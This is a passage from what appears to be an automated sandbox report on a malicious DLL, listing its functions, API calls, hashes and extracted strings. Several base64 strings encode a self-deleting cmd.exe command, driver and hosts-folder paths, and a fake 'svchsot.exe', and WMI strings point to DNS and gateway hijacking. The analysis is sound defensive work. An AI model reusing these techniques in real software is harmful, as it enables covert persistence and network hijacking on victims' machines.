                                                                                                                                      • Instruction Fuzzy Hash: F7900270545110ABDE015B21CF4A4097A61AB85B01B048454E14940031C7318810EA12
                                                                                                                                      Function 10003F72 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1174141254-0
                                                                                                                                      • Opcode ID: 6dc1e466dda3ac71b59e7395498c1fa1529f77b3beb14a38e7d5df6994b7eb4f
                                                                                                                                      • Instruction ID: df56204a28902bd86cd8e7b59e1535f4ff11cbe2af3c274bf077f84441daad3a
                                                                                                                                      • Opcode Fuzzy Hash: 6dc1e466dda3ac71b59e7395498c1fa1529f77b3beb14a38e7d5df6994b7eb4f
                                                                                                                                      • Instruction Fuzzy Hash: 869002705051109BDF015B11CF494497A65AB84701B00855CF05A41431C7318910EA01
                                                                                                                                      Function 10021083 Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: bf1d1e3a1c2f17a36d2a51554b743db3e16ecd4b390662b507f00db5dddfb732
                                                                                                                                      • Instruction ID: 098daddb9c180eb0cce6face120d269c8346ae4d901f60fa8a4d7482fa087a09
                                                                                                                                      • Opcode Fuzzy Hash: bf1d1e3a1c2f17a36d2a51554b743db3e16ecd4b390662b507f00db5dddfb732
                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
                                                                                                                                      • %s\%s, xrefs: 10005431
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
                                                                                                                                      • c:\windows\system32\drivers\%s, xrefs: 10005498
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: rand$wsprintf$FilePrintSleep
                                                                                                                                      • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                      • API String ID: 2577056782-455112146
                                                                                                                                      • Opcode ID: 1bd381572b5b385b7fdf6e01a01ecb1d68b955a03f83e79171d9c90d4618b5a2
                                                                                                                                      • Instruction ID: 890992f53ccb8bcf3efa63f38db088aa64bba12002f314d7c4cebe62ca78ea42
                                                                                                                                      • Opcode Fuzzy Hash: 1bd381572b5b385b7fdf6e01a01ecb1d68b955a03f83e79171d9c90d4618b5a2
                                                                                                                                      • Instruction Fuzzy Hash: CA611773A00258BFEB14DB64CC46FDE77ADEB84351F184466F6089B180DBB5FA848B60
                                                                                                                                      Function 1000720E Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007338
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 1000734D
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007368
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007377
                                                                                                                                        • Part of subcall function 10007A62: VariantInit.OLEAUT32(?), ref: 10007AA1
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007505
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007513
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                      • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
                                                                                                                                      • API String ID: 2640012081-1668994663
                                                                                                                                      • Opcode ID: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction ID: 774f900a019f83844f3bb95aad3f9d8ec9bae888818d20f4d4ee3eb9d32bfb7b
                                                                                                                                      • Opcode Fuzzy Hash: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction Fuzzy Hash: 52D18F70D00219EFEB15CFA4C8809EEBBB8FF49780F104419F419AB255DB75AA45CFA1
                                                                                                                                      Function 10004D36 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 302COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004EC5
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ECB
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ED1
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 10005009
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000500F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                      • API String ID: 1927566239-2685825574
                                                                                                                                      • Opcode ID: edf217bf3ec406bacba446aab0ce709df4c27b3c315b635461df69dc86cc8c5a
                                                                                                                                      • Instruction ID: 8c544d8820f47f8c2d588d66ad59eabb0b2f9e9606fb3a9374643a4bafb8e659
                                                                                                                                      • Opcode Fuzzy Hash: edf217bf3ec406bacba446aab0ce709df4c27b3c315b635461df69dc86cc8c5a
                                                                                                                                      • Instruction Fuzzy Hash: DFA17EB1900209AFEB04DFA4CC81DEEBBB8FF48390F104569F515AB284DB31AE45CB60
                                                                                                                                      Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103filethreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 1000574F
                                                                                                                                      • wsprintfA.USER32 ref: 100057B1
                                                                                                                                      • wsprintfA.USER32 ref: 100057C5
                                                                                                                                      • PrintFile.4HSURTWNWJ(?,?,?,?,00000000,?,?,?,?,?,?,?,10016AD0,00000000,00080000), ref: 100057E8
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000,00000000), ref: 10005835
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: wsprintf$CreateFilePrintThread
                                                                                                                                      • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                                                                                                      • API String ID: 1788855648-1421401311
                                                                                                                                      • Opcode ID: 1beeeb2e758109d046f530d103eaa44c0c7535b6aecf8c361ad79b06f91c6193
                                                                                                                                      • Instruction ID: 3475601ff51186fd0577e9aefcd7f13683c9e8deab9ec6392723b4efb7ee459d
                                                                                                                                      • Opcode Fuzzy Hash: 1beeeb2e758109d046f530d103eaa44c0c7535b6aecf8c361ad79b06f91c6193
                                                                                                                                      • Instruction Fuzzy Hash: E531A772910238BBEB21D7A4CC45FCF7B6CEB08356F0404A6F708FA051DB71AAC58A95
                                                                                                                                      Function 1000436F Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 72sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$wsprintf
                                                                                                                                      • String ID: %s.%d$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$self
                                                                                                                                      • API String ID: 3195947292-4033731652
                                                                                                                                      • Opcode ID: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction ID: 4c3d49f5aa9e73cfdb38f6eb8da828af3488b33cf980db7ddda8d91dcb2ab0ee
                                                                                                                                      • Opcode Fuzzy Hash: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction Fuzzy Hash: FB1104B6410254BAFB11FB24DC82BDE3759EF043D6F114015F6486D095CFB6EA808A28
                                                                                                                                      Function 10005989 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 100059AE
                                                                                                                                        • Part of subcall function 10004115: Process32Next.KERNEL32(0000005C,0000005C), ref: 1000411D
                                                                                                                                        • Part of subcall function 10003EBF: lstrcmpiA.KERNEL32(0000005C,0000005C), ref: 10003EC7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: NextProcess32lstrcmpiwsprintf
                                                                                                                                      • String ID: 11301248$11301248$C:\Users\user\Desktop$C:\Users\user\Desktop\4hSuRTwnWJ.dll$C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      • API String ID: 2614205108-2043392547
                                                                                                                                      • Opcode ID: a70dff313069603f60a8c9c7f1004763433741289a0390b464a64247ac508dae
                                                                                                                                      • Instruction ID: e7e72c90aa8c6484ba63b2d325662b3a8dd1fd61e55c9f6cccae9419d669fdb6
                                                                                                                                      • Opcode Fuzzy Hash: a70dff313069603f60a8c9c7f1004763433741289a0390b464a64247ac508dae
                                                                                                                                      • Instruction Fuzzy Hash: ED01267920025CBBF610F315EC42EEF3B5DCB892E5F414026FA04A919ADA72FD858475
                                                                                                                                      Function 10005CF7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
                                                                                                                                      • API String ID: 1721638100-2890774959
                                                                                                                                      • Opcode ID: 33ea2848b0bc3da7384bcd1edad61293b65bebd0800f34c916c6c70b8e553ac8
                                                                                                                                      • Instruction ID: d10eea2e68a17fc7dae01a0a692719cf89fcc4e95e635f9962b470bf74251c26
                                                                                                                                      • Opcode Fuzzy Hash: 33ea2848b0bc3da7384bcd1edad61293b65bebd0800f34c916c6c70b8e553ac8
                                                                                                                                      • Instruction Fuzzy Hash: D81106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA72AFC44A60
                                                                                                                                      Function 10005C4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
                                                                                                                                      • API String ID: 1721638100-518030693
                                                                                                                                      • Opcode ID: 628b499e9a68a97e2ed47c29d2a86c48c529a9e8e13b1be541f5ff1dba026eb1
                                                                                                                                      • Instruction ID: 275623b6bb4d38d455d16e038d1f67d5d5eba5b08857937f3fa6caa2442e2442
                                                                                                                                      • Opcode Fuzzy Hash: 628b499e9a68a97e2ed47c29d2a86c48c529a9e8e13b1be541f5ff1dba026eb1
                                                                                                                                      • Instruction Fuzzy Hash: 131104769041197EFB21DAA4CC42FDB776CDB14384F0085B1FA48B6080EA71AF884660
                                                                                                                                      Function 10004630 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: wsprintf
                                                                                                                                      • String ID: %s\%s$.$\*.*
                                                                                                                                      • API String ID: 2111968516-2210278135
                                                                                                                                      • Opcode ID: 99f7be559b67a5c4233a1102e690c153991e10450d31d220ccf245b31eb07105
                                                                                                                                      • Instruction ID: f5f062f8905d167b997c6355d0c7bab38e41e78a09b79b991177f9edbeb39cb3
                                                                                                                                      • Opcode Fuzzy Hash: 99f7be559b67a5c4233a1102e690c153991e10450d31d220ccf245b31eb07105
                                                                                                                                      • Instruction Fuzzy Hash: 95319DB6C0025CBBEF12DFA4CC46EDE7B78EF05390F0405A6F618A6055DB30AB989B50
                                                                                                                                      Function 100087F4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 32sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008810
                                                                                                                                      • C:\Users\user\Desktop, xrefs: 1000880B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleepwsprintf
                                                                                                                                      • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                      • API String ID: 1749205058-3416770859
                                                                                                                                      • Opcode ID: 0d12d568754462802f34e5c0946df10e51ba24895e77a899ac77984568793c0a
                                                                                                                                      • Instruction ID: de2e4804827ab9c8765564aaf0192bcf411efbf7cc645f38754259ca53838aa2
                                                                                                                                      • Opcode Fuzzy Hash: 0d12d568754462802f34e5c0946df10e51ba24895e77a899ac77984568793c0a
                                                                                                                                      • Instruction Fuzzy Hash: 19F027B2400199EFEB11CBA4DC86BDA3728FF04289F040875F301F9081DBB1AAC48F85
                                                                                                                                      Function 10005F98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
                                                                                                                                        • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CBB,?,10005CBB,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateTimer$Concurrency::details::platform::__FileQueue
                                                                                                                                      • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                      • API String ID: 3486561800-1671016533
                                                                                                                                      • Opcode ID: 91917efd60eee5a4c7f72a7cce19e0cd623d68f546c36473dca52c4ca7f31dab
                                                                                                                                      • Instruction ID: dfcc7b63688ca43a2c74d680eb54bb4daf041f1c606f04c7c9245eb5a67af0f6
                                                                                                                                      • Opcode Fuzzy Hash: 91917efd60eee5a4c7f72a7cce19e0cd623d68f546c36473dca52c4ca7f31dab
                                                                                                                                      • Instruction Fuzzy Hash: A3F046768001187AF620D665CC07FEF3E6CDB857E0F104121FA08E90C4EB75AAC196E0

                                                                                                                                      Non-executed Functions
